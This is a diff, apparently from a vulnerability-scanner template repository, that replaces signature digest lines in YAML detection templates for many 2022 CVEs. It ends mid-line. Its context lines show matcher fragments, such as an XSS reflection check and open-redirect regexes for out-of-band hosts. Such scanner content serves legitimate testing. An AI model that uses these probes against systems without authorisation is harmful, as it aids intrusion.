4a0a00473045022100f36a9bf85dfcc41ee9545febc1956f4ed4454e2d25c5702f530867e85e13fe5c02200ffe3449b9ca1eafdbb755aa20dbe64f4d69573f7b3611579e743a7c097a240d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cb9929003f88df82f0a77818262d437107b7afea635bef59c7332ef375aaf79c02202c80ef57510e6c6a93e23a271e903d6f854239a7c6ccf7ec1a7b183c71ae2082:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 52b535bd97..9836719a67 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 400 - -# digest: 490a004630440220077d69da3a9004b2930718ac3e1a8284a7033d10c86b53224e73cb2ded06542702203762c789047fa8c37e0e155b67f08b332e090c6f77ebd8b06b2e4e63592caa48:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100baacc005d17707f021ec842f4f8c31a9daeee64fa2ff2292f496b19ce45dae17022061cd57675aa091d4089589b3f80a71fe50e3a7505f66241e1341a76b6f6a1fb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0415.yaml b/http/cves/2022/CVE-2022-0415.yaml index d2fe16eefd..796bdc242f 100644 --- a/http/cves/2022/CVE-2022-0415.yaml +++ b/http/cves/2022/CVE-2022-0415.yaml @@ -116,5 +116,4 @@ http: regex: - ' "uuid": "(.*)"' internal: true - -# digest: 4a0a00473045022100ba2260b8ef9120e228a82d124e35ddfd708d0df6ccce1046cd65d6f5063d854602204d734c8e6f5017cfe35b9fec019904ef53177dfc52454a9a160f08e1f4260b3c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ff060b764153edf8d0b8a67b826f4f9883225dc1ccccd78ebbbd301850aec4be02204512b25518e442c495e2ecb7abda9650a6eead99544b7b6a1f5034f2188d9e50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 7e730162d7..c0e0cfd4f5 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -56,5 +56,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402204b00504ab4fef95d51e372a771073efd41b12cc73737efbbc3c19a0ce640b5be02205400a5c9d38780baedca7b189b523b3e4a2e45dee9479188d82d5706c62f5808:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022005e01f2b79ab7ee4de4f4903726cc0cbed396e75428eef1b37fe9790c21b0eca022100abcb3c54e1047bcaa0359e87ad2a28dad81b7eebbafd6ffe589ab63ecb9fa293:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index a7ddc181db..fec8d450cd 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -41,5 +41,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100b2bd00e6b6acd514d53a6dd81ad5ebb998c004ca771a942ff559073c50bc2e09022100ae7968a4adf78d3c47ad58b5474b099e2060c9bc27e6d155084eb438c2b2ca57:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202e1a527b26f68dfaaa2908b4a0dd2417be20ab055bf473a00743cd19f674eb570220478e3ae61d25bdbd2caf927a7c0c73efb0b7f4ef6ba8dd28862a2e5db79ce979:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 5b59631bca..55b9f9127f 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100fff27768d84e0d1d9d9a22e80a297e8106703d4636c28c1a64d71e50b7de7de302200b87600ec4e2a4000266170598e818ecd0f00532b9e3a9e6b8975c6041379aab:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a1a49a8b8429e1356dcdf36448892851a9348902585be640bc5eefbee2ac2eff02205d04a9640f11429b05064fbbc2e930734fd939b27f3c4b4cacbbab08f92a6daf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0437.yaml b/http/cves/2022/CVE-2022-0437.yaml index e6020d0c1f..72fef2637e 100644 --- a/http/cves/2022/CVE-2022-0437.yaml +++ b/http/cves/2022/CVE-2022-0437.yaml @@ -57,5 +57,4 @@ http: regex: - "(?m)VERSION: '([0-9.]+)'" internal: true - -# digest: 490a0046304402207ca1b84525070a5abf64fd23cf8b928d61670be472be602fd26870613fd0d14d0220283f6efcd80bb8a3f9cd81642a66ff0d5947db15136ede647c60fe406b497a06:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220557ac32f666c99271776323238a24bccb1f13a08c715e7ef65d0b47e3a915105022100c307519c7571b443693cee3a43b4a5e6af2fa7be67720061d984d1761b377e67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0441.yaml b/http/cves/2022/CVE-2022-0441.yaml index c3710e48cc..81fd676e40 100644 --- a/http/cves/2022/CVE-2022-0441.yaml +++ b/http/cves/2022/CVE-2022-0441.yaml @@ -78,5 +78,4 @@ http: kval: - user_email - password - -# digest: 4a0a0047304502207fa15bd1788fdf963c0194b255f032d4e981032af0fe0830a1d82f5652f7a0a2022100bc9bcfd8c1e892144478a0d6e26271f19303f12e359257fe1b30b815066d0ba3:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e9bb0bbefd7a1338f6bdb2a0170f9ec4159004ddb9a36b75716f5574dcee841402210097632bf8bd0246d52d085a0ff412b8d3a8f7654517e975182134c4e627d4da97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0482.yaml b/http/cves/2022/CVE-2022-0482.yaml index afdd967739..763de9ce6b 100644 --- a/http/cves/2022/CVE-2022-0482.yaml +++ b/http/cves/2022/CVE-2022-0482.yaml @@ -64,5 +64,4 @@ http: kval: - "csrfCookie" part: header - -# digest: 4a0a00473045022021a95ad8d590c550bef9a0312d4bd1fe56c2051a7eaaae72212c50db593b12c0022100d903772f0aded0ca969abed991e2e83007ce5eadd182e4276481d1ae37903d20:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100bbdce44bc45ecf9f0aa315c6695d8b912c33489d4d8b52ad40166f246bb24994022100e50b50de9a44001b03cb2c255ce4130f88b8e5828fcabc0114f241231f4c5edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0533.yaml b/http/cves/2022/CVE-2022-0533.yaml index 92b1941057..a088109d42 100644 --- a/http/cves/2022/CVE-2022-0533.yaml +++ b/http/cves/2022/CVE-2022-0533.yaml @@ -49,5 +49,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "ditty")' condition: and - -# digest: 490a0046304402207924aa986521c4d765d6c330ec546941da2741e75c14736f2bbea63354dc6669022004a21f164db09d6d8a13d9f736820c1ad68330cb44be9c8aae35c6c229741911:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200c495e9665baf940f384b8ccc1084fff12dd8bcd097d08041a262a6bb4fbc1dd0220067d98a7db7b4ef3ff38fc93b5aada890a224c2786b94054afff18227213adec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0535.yaml b/http/cves/2022/CVE-2022-0535.yaml index 61c77eab0a..738d6b7e06 100644 --- a/http/cves/2022/CVE-2022-0535.yaml +++ b/http/cves/2022/CVE-2022-0535.yaml @@ -70,5 +70,4 @@ http: regex: - 'name="_nonce" value="([0-9a-zA-Z]+)"' internal: true - -# digest: 490a00463044022018577fc15ac108094f6cbaea8d4548376e41f7ef3a63fd3f63664ca95445064f02200c015da67d7edfa766248335226a1f6d3ca3a1851a7aba323ab0c6e3c069105b:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220483a40ef15be56335ca43f7bf5154f85f54c32a465dcd3695c766ba84bb236e302207912f3b5a51eb0ca622cdb5e75cd2c133635932002c4f427f74913b4336208f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0540.yaml b/http/cves/2022/CVE-2022-0540.yaml index 6426712fff..886eda39ba 100644 --- a/http/cves/2022/CVE-2022-0540.yaml +++ b/http/cves/2022/CVE-2022-0540.yaml @@ -43,5 +43,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502203fe06e17d7c6874e3d8792fbcdb0d7d164e13c2cbbbd30bfe4938fa03f4c08fa0221008ab06988b480eb95ca609580fe0fbd89c179b6d17c5ab4547c918c511ad01b3f:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e3aea6395b04ce350c742abb36aa718935bf4b09640dc2b4d9520c48cd68589602210099978141eaba29f0a1b0a7a9dfb4fd5d0d2e1ad47eaedb2af8e08f245a6da7c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml index 0bbdee439a..a0ada69106 100644 --- a/http/cves/2022/CVE-2022-0591.yaml +++ b/http/cves/2022/CVE-2022-0591.yaml @@ -44,5 +44,4 @@ http: part: interactsh_request words: - "User-Agent: WordPress" - -# digest: 4b0a00483046022100cd99b59fb45fa14cbd726531ff49fb85ab128167c51b82c015891e06cd85412e022100e08a788f5e06cea8a7150635981c8a0e8205ab0f007c543d920ccd1388da3f85:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207931095a3d422464ed3574e5a0de987c7a06e4a9ddd94ad05121b912693958a9022043812f3a6359f28f0a76ece2a1a9b5f38bb64aee23903453d7a20dd5f831bb97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0594.yaml b/http/cves/2022/CVE-2022-0594.yaml index ddbc9d4314..08ae430170 100644 --- a/http/cves/2022/CVE-2022-0594.yaml +++ b/http/cves/2022/CVE-2022-0594.yaml @@ -50,5 +50,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100a2f1e666b3c7a76d5e2249b4776ca91b7fa4f41b90bcde8479165b2ee462a5e6022100e9ef14f21f9cfa385b019a42bbfaffcd60159d8f5c4a27e953bdc5c7cbc33508:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210083b2a4ee3ed3c7fa5c4518833ed868c77f556245d3799fb35ffc18671f1fa6a80220270f04a2a6b9ba2bc2a68c6010bbc62becc12866f4f0d6b47577f9437eb51048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0595.yaml b/http/cves/2022/CVE-2022-0595.yaml index c93e0fe577..baf9d54f75 100644 --- a/http/cves/2022/CVE-2022-0595.yaml +++ b/http/cves/2022/CVE-2022-0595.yaml @@ -62,5 +62,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'status_code_2 == 200' condition: and - -# digest: 4a0a004730450221009c316a673f983f5e8a3bc2197d8181b3a5f0e38308faa82d7f9d23ff9b4d5222022020ba0ddbbf9318d744e1a084692c77f82146dccb62f95cc14b4ebedc2b147714:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e6007715a3c7fe4cdd2517f2cbd5411fce313e0ce1907e9520b4ddf88822a8bd02210090e2e41b95fb5b678f1cebe61d63c4f753951c4fef670ede5635da1940ffcf26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0597.yaml b/http/cves/2022/CVE-2022-0597.yaml index 31f7d6de90..357a86e880 100644 --- a/http/cves/2022/CVE-2022-0597.yaml +++ b/http/cves/2022/CVE-2022-0597.yaml @@ -37,5 +37,4 @@ http: regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)oast\.pro.*$' part: header - -# digest: 4a0a0047304502202707b1f7d75e8c949b5c1660118f744f5d567e69db2dd20077fe4b8b61f13082022100a10e426b5fc9edcd476e7cd5188dadc02bc23e88e6b31e6dea80779a90a19e7d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a004830460221009d64a54d0b8769623c44d6f89b13978ce9a75898de623a5ee3c1e4e06f92d256022100b74387e342d93b2a0d36996bfc0f0d6158027255412a56b9728329232030aa91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0599.yaml b/http/cves/2022/CVE-2022-0599.yaml index 1d4e2f14e0..3163552a4f 100644 --- a/http/cves/2022/CVE-2022-0599.yaml +++ b/http/cves/2022/CVE-2022-0599.yaml @@ -54,5 +54,4 @@ http: part: body words: - 'id="mmursp_id" value="\">" />' - -# digest: 4a0a00473045022100e7f82c2f2d62e94400522bf93c305c05fff5643c048832125f8d69e7929464d402203204140b25aa40efbfca05bed02d6a02f3ab03199657c9889d8b8d8a1b3e6364:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ecd56a4ff4319d6939d33d40c46529b68cb9c9b874cdb1c515a85bae59a56224022021cf88cb21da00bcbcc69986d0ba4e6394bc526ccfd3751967f7b7ba6a1c1455:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index da544a0512..abe832224b 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -57,5 +57,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true - -# digest: 4a0a0047304502207ae93b71460164bc99b2b7621b5cdf4feee5db5b5914a5566c34089c3ad7a524022100a30f35d2a554c5bb14f5c7ff6858f6af3f7551a07af1a09bad65213e732e235d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210098f41759d07e72e35a0c60c7aa27f90f0b09bd6ce64564f8e6bfcc6483807959022002ac30d7f447f415b1ecc5a0c0cb7c87e658739464f32f34519ce75c3b775508:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0653.yaml b/http/cves/2022/CVE-2022-0653.yaml index 7525042cac..89f0c1fd76 100644 --- a/http/cves/2022/CVE-2022-0653.yaml +++ b/http/cves/2022/CVE-2022-0653.yaml @@ -46,5 +46,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402203767f59d5648e69821796eaa56f68e2da457d842b717b1364d0dea2e81acbd4d022068c2ba438ee714bb4c65763d305651c28cdba22d0c2b272a7248f60778536c3f:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022018b99d8d0115e8c04b49bfd2c39288f1fd10a2e3c065d252415fbaf4ac6387f6022076d5ddb341808bd467880f33fd0bc65cd0d2260352e3a0cc981379e295da88e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0656.yaml b/http/cves/2022/CVE-2022-0656.yaml index 1722061d50..5f98feb83d 100644 --- a/http/cves/2022/CVE-2022-0656.yaml +++ b/http/cves/2022/CVE-2022-0656.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ce6aa836602cef7bc61b8e69980452967d4a1bef88f528c11f38961d9af5cd8902202983fb6eb704e7072a06842e705482d84f589375a41c7290c72a44889f764f7c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206a47dc43f616633acfce910500ebfc679a437d253a6f9fa97ff74b4818ba8f7e0220303f5ea32c1e90dccdfb2d82577678f672f88e20df1f4afd528f599e32e60632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 8edd33180e..9057828d5f 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -46,5 +46,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' condition: and - -# digest: 490a0046304402206defe8d35998a799358004f7ba8f2cb4ede22eaa20aa985680a81526ea5b148602203190a2fc31f06dd475fbe25d7c2d1e63b73890b030af50c91e28fdbfddde3875:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022039373620c0ca53809d78f8003057c2a787440a0f6ec52560b4ebe798345a19a6022100c91091454fb4d8a88b398ae67df36f5777e52e609e1f8b0252e282cb74426928:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0660.yaml b/http/cves/2022/CVE-2022-0660.yaml index e1d7b19403..6c6de6b3a6 100644 --- a/http/cves/2022/CVE-2022-0660.yaml +++ b/http/cves/2022/CVE-2022-0660.yaml @@ -56,5 +56,4 @@ http: - 'contains(header_2,"text/html")' - 'status_code_2==500' condition: and - -# digest: 490a0046304402201823e928e8ede565030c965a4fd420b83661e30fc9b53a4a66ca9b866832e7a402203e59c32971fd522341d71f5fd6dba9bfcff59b246fdd1d309b1562edfb5fd700:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206923ad08d5d31943859b266a29a36994289b9b4e051afa2d6829395edee6291f022022629e1f10849effe48265cdc3b54095ce97dd1e5c744c49af3e7f84e6a629da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0678.yaml b/http/cves/2022/CVE-2022-0678.yaml index 70f67ac995..46a425ae57 100644 --- a/http/cves/2022/CVE-2022-0678.yaml +++ b/http/cves/2022/CVE-2022-0678.yaml @@ -52,5 +52,4 @@ http: - type: status status: - 404 - -# digest: 4b0a00483046022100dc40fb67c495a8f65d250257d8312110785cba7eaa523e217d5ff63191f2cc9f022100d07f6b231a913b3ddcaefd5e0348a5357b762cc0fcdb1f662891d9216bca64f2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100aadc03993547d88113cf3b0d93992eb3b9b7dce49a4fdea3e550e5f1f3b952310221009968df4d75dcb75a90d035cb7f4d7126fe4380c6d21b84d1583c35095b16b642:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0679.yaml b/http/cves/2022/CVE-2022-0679.yaml index 8501ec2909..20ddef5dd1 100644 --- a/http/cves/2022/CVE-2022-0679.yaml +++ b/http/cves/2022/CVE-2022-0679.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502200ffb1bf57ed211734feda6394d8d14766746947761bf06047aa1ed9909452fd7022100989fb940c700cba7168a20984d16ea804ddecadf11403a48901ef805703ecb7d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022066c27cafe462245108a6afd2c795435f0b3515b73c1f146365c9a8d9d437daa8022100cb3533829f54f6ac1bf74c25760aacce2d8983cda5bb0db7b3e23e8cb7044c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0692.yaml b/http/cves/2022/CVE-2022-0692.yaml index 0829e1aaa1..8e037cb368 100644 --- a/http/cves/2022/CVE-2022-0692.yaml +++ b/http/cves/2022/CVE-2022-0692.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - -# digest: 4b0a00483046022100d79b08c2896c5273c8f0623c84d5d439b93ddb7655f90f56f9162c0a82b49875022100d16280e19e9239923ecdfe58e20bca2235036cd6e13914bdd658b9077f6b6da1:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201e1743193720a9bd387198f1e66d1a12329a2efd7db430c0b1843e7dc17e985e022100bf626dc06173d1fa154b72bcda4bab4ba7410725de1912bfab89bc22b2f086c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 77344aba68..2ebfed6334 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -42,5 +42,4 @@ http: - 'status_code == 200' - 'contains(body, "Post Meta Setting Deleted Successfully")' condition: and - -# digest: 4a0a0047304502202b1177d936370e75ce3792cc3ced5102f24cfb6874248d0ce78037e6fb20e850022100d067ab93b8dd5cc36ac6f03296d378d63e5d50ea0d62adfe0dca10712384a6ee:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022064cfcf107fc40638ed365849bbf400a40447dfd65662cc252d84e41938f135dc0220329c43d26591791b1814c603b587987e63039a4c958214f2c9d4e54ff05f622e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0735.yaml b/http/cves/2022/CVE-2022-0735.yaml index 2fe6234163..005add26c3 100644 --- a/http/cves/2022/CVE-2022-0735.yaml +++ b/http/cves/2022/CVE-2022-0735.yaml @@ -108,5 +108,4 @@ http: group: 1 regex: - '(?:application-)(\S{64})(?:\.css)' - -# digest: 4a0a0047304502210086332fce0c682233e162bff21c961246a0e80c9e19ad783a0ca6b9e826d11bc302204c3cbb74bd29a01d85b747738e9cc497fdd4c572b4e672bb518268f0c04fff56:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220637c53633c44f679fba86509a5cd6b540d6c5fddfc9a022521c425a5d54e4340022100fc0e4b20c03273b3e0dd0843a0da8e5c6630be227f5ae311d70ffa854a857b1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index 1ba7c4139d..227e996100 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -49,5 +49,4 @@ http: - 'contains(content_type_2, "text/javascript")' - 'contains(body_2, "show_ilist_templates")' condition: and - -# digest: 4a0a0047304502203ba69c0278ce7cabcb9c3764edfd38a52e0ccfaace1b3e5c061f22b67eb88001022100dc38d179f668bd3a9e7c897fee02394b8591f327e6ae64fbb0b7411a478ad8ee:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100a9e84fd4ae213c678ed817fb653d144f089693b763da9e63d75a88d1996e78f9022048d2fdbfa743dfbb9f9a490ada1aae3e500b43c56519b776c68494923413bedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 8b316674a1..df678884bd 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -47,5 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "vote_status") || contains(body, "critical error")' condition: and - -# digest: 4b0a00483046022100a06934bf1b886a23e17660008b1f4c3780d77ab5d21691adf9304568c2f416aa022100f890d2a9955e5f430752c64bda34d3b2f4375d4fc364d144bebb07c84ec00c3e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220311c0320bf1eb8c84e7e17282523e2706273445ce9fbad864c433f5c474b813d022100830282f33c8024fe5c38804e3b26f2c7d8dd2ca4a8e4099f517ed327a3b65a8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index d4ffbdeab6..b9f40293e4 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "You have to be logged in to leave your rate")' condition: and - -# digest: 4a0a004730450220380456043a7373459384a325b3e32d4b3a25d22dc98ed048701ec2eda5bced1c022100d3963b0cf46c645e8022bdc90455b5b98e8dac32e5734636eb978e29dadfd716:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205914096496e92def26deceb0c3a1989c82f308ee717dd53064e0cf1ad2fae1730220746e686bad3b8ffb67c610a30310e246a4affd6abbf26616432cf1a5246fb827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index d7e0c25874..612bd64a5f 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -50,5 +50,4 @@ http: - 'contains(content_type_1, "text/html")' - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")' condition: and - -# digest: 4b0a00483046022100e95d83e33a687d39dc3b423a880a99b9bd67bbb326ef5bdcbc72c93d596250060221009a61d75f09611b24acfca2c75c9ff0584ae1a86f3a55bd2babac427bac94db77:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202398e4e39592962cb9f184f5bf32c067d2b7d446025f207c74eaa460f188440f022100e98d47a2ae16c929e5acbbefff311527aed7311a9a4a389bdcee6040dd8665b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0776.yaml b/http/cves/2022/CVE-2022-0776.yaml index 6dc07be188..ab2ef7a63b 100644 --- a/http/cves/2022/CVE-2022-0776.yaml +++ b/http/cves/2022/CVE-2022-0776.yaml @@ -46,5 +46,4 @@ headless: part: extract words: - "true" - -# digest: 4a0a00473045022077bc8dcadd64a3c9ff22e022b0b8e6bcca6c6c814ed801a76787808d2909089502210091a610b09604454b822a0e9fd15ec818db46fc6a795dfa0c3937ff11a4eebcbf:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022063ea0281a83679dfead58cae791f12e4a454dd6628bb926e27b7d501c8ea1b6f02203d80b6a4eccec24cda96fa5f57afe82b61d7433cf16cdd38fa9a669978c76861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0781.yaml b/http/cves/2022/CVE-2022-0781.yaml index 2dc46bf3ae..a9b1f1d7b0 100644 --- a/http/cves/2022/CVE-2022-0781.yaml +++ b/http/cves/2022/CVE-2022-0781.yaml @@ -49,5 +49,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100efed09ab924e82ddf4e836686a9aa93dca9bd193ca139b9f515e37737c3a18140221008180ca82beac40cc35d44a527bafb78985cb584554a95e3acd9fa5f77d7b3d2e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200b5c2366630511184a87edf0ae4dbd42928c55a8564b16f05084137ef5126e42022100976c318ff7cceca8c454b374ea5d0efbdf125040c48ebebe73e46413a0c57a44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index d16fb56feb..a338cabe5e 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"images\":")' condition: and - -# digest: 490a004630440220250cf7488514ea160c2ffa539a94cf12467ebb951854900d0e8b53ba240f94f502206ab6bbbeefdb1ac9809ba0d4d6a077f3d6d7a1ee4d09e3fa763b10a51c69c728:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402205584a7970819ae7d7b527c639f4ab9612b071a2e112ecc3fe2ce15454b9d379102205beab037b6e3fd3893f1d40f11fa387fd1c1c72b33d433756b41817beec922d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index a2c7ac5bc6..2162379786 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -43,5 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "dptTimetable customStyles dptUserStyles")' condition: and - -# digest: 4a0a0047304502207b1e13d669fbd15e2abcee64d6bbb9aac043aacfcf0aace8f688219a4625bc6f0221009cf4ce66ee7d3b964aee0793994cd772cd95cf95304f7fa2c649d72acc5028fc:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c9e81803bbfb35cadc298aef9ea4ee13a827d6b0d80127b01535df44634d9769022078115f2ef774701ee9d53a1ad0ffe80bb8f9abfee2ec52c404354677f40910cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 317b47057c..411a5d66fd 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -43,5 +43,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' condition: and - -# digest: 4a0a0047304502201b7eff55667b702a45ebd33134cdf4af716e14b82481f2110f9b04950d3932fd022100de68232d6077891c94a091ac77f4b3dbda2d3dc78a74b3f342779161dde8cadc:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022065c96b8df9d6831ea5a303a6e5e140f990eacc50309b9735407ee8efe8c9158b022040fb8114f7888b2782ea1bb848472b4a43bb073037b13d7308b3ebdb3ef34d14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index b51aaa194c..b453d14819 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -46,5 +46,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "Invalid 